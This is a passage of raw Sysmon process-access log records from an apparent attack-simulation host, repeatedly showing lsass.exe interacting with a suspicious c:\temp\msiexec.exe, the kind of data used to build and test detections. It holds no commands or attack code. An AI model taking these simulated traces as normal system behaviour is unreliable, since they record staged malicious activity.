15:05:28.604{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeC:\Windows\Installer\e4f514b.msi2022-06-17 15:05:28.604NT AUTHORITY\SYSTEM 10341000x80000000000000002700784Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.604{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9838-62AC-616B-000000006202}4400c:\temp\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002700783Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.604{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9838-62AC-616B-000000006202}4400c:\temp\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002700782Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.604{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9838-62AC-616B-000000006202}4400c:\temp\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002700781Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.604{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9838-62AC-616B-000000006202}4400c:\temp\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002700780Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.604{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9838-62AC-616B-000000006202}4400c:\temp\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002700779Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.604{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9838-62AC-616B-000000006202}4400c:\temp\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002700778Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.604{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9838-62AC-616B-000000006202}4400c:\temp\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002700777Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.604{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9838-62AC-616B-000000006202}4400c:\temp\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002700776Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.604{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9838-62AC-616B-000000006202}4400c:\temp\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002700775Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.604{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9838-62AC-616B-000000006202}4400c:\temp\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002700774Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.604{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9838-62AC-616B-000000006202}4400c:\temp\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002700773Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.604{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9838-62AC-616B-000000006202}4400c:\temp\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002700772Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.604{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9838-62AC-616B-000000006202}4400c:\temp\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002700771Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.604{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9838-62AC-616B-000000006202}4400c:\temp\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002700770Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.604{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9838-62AC-616B-000000006202}4400c:\temp\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002700769Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.604{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9838-62AC-616B-000000006202}4400c:\temp\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002700768Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.604{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9838-62AC-616B-000000006202}4400c:\temp\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002700767Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.604{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9838-62AC-616B-000000006202}4400c:\temp\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002700766Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.604{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9838-62AC-616B-000000006202}4400c:\temp\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002700765Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.604{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9838-62AC-616B-000000006202}4400c:\temp\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002700764Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.604{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9838-62AC-616B-000000006202}4400c:\temp\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002700763Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:28.588{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-9838-62AC-616B-000000006202}4400c:\temp\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002700762Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 